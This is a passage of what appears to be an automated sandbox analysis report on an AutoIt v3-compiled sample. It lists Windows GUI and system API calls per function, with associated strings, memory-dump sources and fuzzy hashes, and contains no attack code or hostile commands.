                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0024D11C
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0024D128
                                                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 0024D142
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0024D151
                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0024D17C
                                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 0024D184
                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0024D18B
                                                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 0024D19A
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0024D1A1
                                                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0024D1EC
                                                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 0024D21E
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0024D249
                                                                                                                                                                    • Part of subcall function 0024D385: GetSysColor.USER32(00000012), ref: 0024D3BE
                                                                                                                                                                    • Part of subcall function 0024D385: SetTextColor.GDI32(?,?), ref: 0024D3C2
                                                                                                                                                                    • Part of subcall function 0024D385: GetSysColorBrush.USER32(0000000F), ref: 0024D3D8
                                                                                                                                                                    • Part of subcall function 0024D385: GetSysColor.USER32(0000000F), ref: 0024D3E3
                                                                                                                                                                    • Part of subcall function 0024D385: GetSysColor.USER32(00000011), ref: 0024D400
                                                                                                                                                                    • Part of subcall function 0024D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0024D40E
                                                                                                                                                                    • Part of subcall function 0024D385: SelectObject.GDI32(?,00000000), ref: 0024D41F
                                                                                                                                                                    • Part of subcall function 0024D385: SetBkColor.GDI32(?,00000000), ref: 0024D428
                                                                                                                                                                    • Part of subcall function 0024D385: SelectObject.GDI32(?,?), ref: 0024D435
                                                                                                                                                                    • Part of subcall function 0024D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0024D454
                                                                                                                                                                    • Part of subcall function 0024D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0024D46B
                                                                                                                                                                    • Part of subcall function 0024D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0024D480
                                                                                                                                                                    • Part of subcall function 0024D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0024D4A8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3521893082-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 0023A42A
                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0023A4E9
                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0023A527
                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0023A539
                                                                                                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0023A57F
                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0023A58B
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0023A5CF
                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0023A5DE
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 0023A5EE
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0023A5F2
                                                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0023A602
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0023A60B
                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0023A614
                                                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0023A642
                                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 0023A659
                                                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0023A694
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0023A6A8
                                                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 0023A6B9
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0023A6E9
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 0023A6F4
                                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0023A6FF
                                                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0023A709
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0022E45E
                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,0027DC88,?,\\.\,0027DBF0), ref: 0022E54B
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,0027DC88,?,\\.\,0027DBF0), ref: 0022E6B1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32 ref: 001E4956
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 001E4998
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 001E49A3
                                                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 001E49AE
                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 001E49B9
                                                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0025E179
                                                                                                                                                                  • 6F3A0200.COMCTL32(?,000000FF,?), ref: 0025E1B2
                                                                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0025E5E0
                                                                                                                                                                    • Part of subcall function 001E49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001E4954,00000000), ref: 001E4A23
                                                                                                                                                                  • SendMessageW.USER32 ref: 0025E627
                                                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0025E63E
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 377055139-4108050209
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,0027DBF0), ref: 00246245
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                  • API String ID: 3964851224-45149045
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 0024D3BE
                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0024D3C2
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0024D3D8
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0024D3E3
                                                                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 0024D3E8
                                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 0024D400
                                                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0024D40E
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0024D41F
                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0024D428
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0024D435
                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0024D454
                                                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0024D46B
                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0024D480
                                                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0024D4A8
                                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0024D4CF
                                                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0024D4ED
                                                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 0024D4F8
                                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 0024D506
                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0024D50E
                                                                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0024D522
                                                                                                                                                                  • SelectObject.GDI32(?,0024D0B5), ref: 0024D539
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0024D544
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0024D54A
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0024D54F
                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0024D555
                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0024D55F
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1996641542-0
                                                                                                                                                                  • Opcode ID: 5932b1bcccda92afe6bfc1f1c4dc0b8037e1f225f133d05859c3eec017d1090c
                                                                                                                                                                  • Instruction ID: cae30240b102790d0f869e61a82c18525146b4669fe2ea4d631eba632c3fc402
                                                                                                                                                                  • Opcode Fuzzy Hash: 5932b1bcccda92afe6bfc1f1c4dc0b8037e1f225f133d05859c3eec017d1090c
                                                                                                                                                                  • Instruction Fuzzy Hash: 30514C71E00208AFDF119FA4EC48EAEBBB9FF09320F218555F915AB2A1D7B19950CF50
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0024B5C0
                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0024B5D1
                                                                                                                                                                  • CharNextW.USER32(0000014E), ref: 0024B600
                                                                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0024B641
                                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0024B657
                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0024B668
                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0024B685
                                                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 0024B6D7
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0024B6ED
                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 0024B71E
                                                                                                                                                                  • _memset.LIBCMT ref: 0024B743
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0024B78C
                                                                                                                                                                  • _memset.LIBCMT ref: 0024B7EB
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024B815
                                                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 0024B86D
                                                                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 0024B91A
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0024B93C
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 0024B986
                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0024B9B3
                                                                                                                                                                  • DrawMenuBar.USER32(?), ref: 0024B9C2
                                                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 0024B9EA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                                                                  • Opcode ID: 8bfbae43446ec3f174dec057a74ba103e44c229c49ea2b7520c4c3258d23c765
                                                                                                                                                                  • Instruction ID: 990cee9fba1d8466f7db4110fe6e09f975103df20b5f73b235ff65ddb9e3b730
                                                                                                                                                                  • Opcode Fuzzy Hash: 8bfbae43446ec3f174dec057a74ba103e44c229c49ea2b7520c4c3258d23c765
                                                                                                                                                                  • Instruction Fuzzy Hash: B4E18075910219ABDF169F54DC84EEEBBB8FF09710F108156F919AB191DB70CA60CF60
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00247587
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0024759C
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 002475A3
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00247605
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00247631
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0024765A
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00247678
                                                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0024769E
                                                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 002476B3
                                                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002476C6
                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 002476E6
                                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00247701
                                                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00247715
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0024772D
                                                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00247753
                                                                                                                                                                  • GetMonitorInfoW.USER32 ref: 0024776D
                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00247784
                                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 002477EF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                                                  • Opcode ID: ce88acdb0ffa677f0a6676b4402df22a297f869de33479463c62e59ce90249b7
                                                                                                                                                                  • Instruction ID: bca0b03eb826c93f1104209a7b123890291abc5ec5f787227400af4f8ba2d973
                                                                                                                                                                  • Opcode Fuzzy Hash: ce88acdb0ffa677f0a6676b4402df22a297f869de33479463c62e59ce90249b7
                                                                                                                                                                  • Instruction Fuzzy Hash: E7B1AE71618341AFDB08DF64D948B6EBBE9FF88310F00891DF5999B291DBB0E815CB91
                                                                                                                                                                  APIs
                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001FA839
                                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 001FA841
                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001FA86C
                                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 001FA874
                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 001FA899
                                                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001FA8B6
                                                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 001FA8C6
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001FA8F9
                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001FA90D
                                                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 001FA92B
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 001FA947
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 001FA952
                                                                                                                                                                    • Part of subcall function 001FB736: GetCursorPos.USER32(000000FF), ref: 001FB749
                                                                                                                                                                    • Part of subcall function 001FB736: ScreenToClient.USER32(00000000,000000FF), ref: 001FB766
                                                                                                                                                                    • Part of subcall function 001FB736: GetAsyncKeyState.USER32(00000001), ref: 001FB78B
                                                                                                                                                                    • Part of subcall function 001FB736: GetAsyncKeyState.USER32(00000002), ref: 001FB799
                                                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,001FACEE), ref: 001FA979
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                                                  • Opcode ID: b6a24378b2cd1beb0334b5acf148f7d99ddf1f4984878bd4ca2237035cd09b09
                                                                                                                                                                  • Instruction ID: 54ba2432c1693be55ee314023eb75bc2b301453a49d573d25224919d1f0847d6
                                                                                                                                                                  • Opcode Fuzzy Hash: b6a24378b2cd1beb0334b5acf148f7d99ddf1f4984878bd4ca2237035cd09b09
                                                                                                                                                                  • Instruction Fuzzy Hash: BDB19171A1020AEFDB14DFA8DC49BAD7BB4FF08315F114229FA19A72A0DBB4D811CB51
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00246A52
                                                                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00246B12
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                  • API String ID: 3974292440-719923060
                                                                                                                                                                  • Opcode ID: eb71373dd8be1a637e0269475a53eb068312b8d2578166075c31a6c49f4fb72a
                                                                                                                                                                  • Instruction ID: c055114fc532ecba23d1f69f3fdbe7bfbefdf5a0b97fbeefa7c3d842b3c25e4f
                                                                                                                                                                  • Opcode Fuzzy Hash: eb71373dd8be1a637e0269475a53eb068312b8d2578166075c31a6c49f4fb72a
                                                                                                                                                                  • Instruction Fuzzy Hash: D5A1B3302246059BCB08EF14C855A7AB3A5FF55354F14882DF8969B3D2DB70EC16CB82
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0021DD87
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0021DE28
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021DE3B
                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0021DE90
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021DECC
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0021DF03
                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0021DF55
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0021DF8B
                                                                                                                                                                  • GetParent.USER32(?), ref: 0021DFA9
                                                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 0021DFB0
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0021E02A
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E03E
                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0021E064
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E078
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                                  • String ID: %s%u
                                                                                                                                                                  • API String ID: 3119225716-679674701
                                                                                                                                                                  • Opcode ID: 1742616da8824651c588ee3428c27ecd916f7bea61b2f77aa9392a7dbb646e8e
                                                                                                                                                                  • Instruction ID: 5100f8747165b3554e22a8b65126d4252d439cc53495b492895f099d4e4a7d73
                                                                                                                                                                  • Opcode Fuzzy Hash: 1742616da8824651c588ee3428c27ecd916f7bea61b2f77aa9392a7dbb646e8e
                                                                                                                                                                  • Instruction Fuzzy Hash: C6A1D131224707EFDB14DF60D884BEAB7E8FF68300F108529F95992191DB70EAA5CB91
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0021E6E1
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E6F2
                                                                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0021E71A
                                                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 0021E737
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E755
                                                                                                                                                                  • _wcsstr.LIBCMT ref: 0021E766
                                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0021E79E
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E7AE
                                                                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0021E7D5
                                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0021E81E
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021E82E
                                                                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0021E856
                                                                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 0021E8BF
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                                                                  • API String ID: 1788623398-1539354611
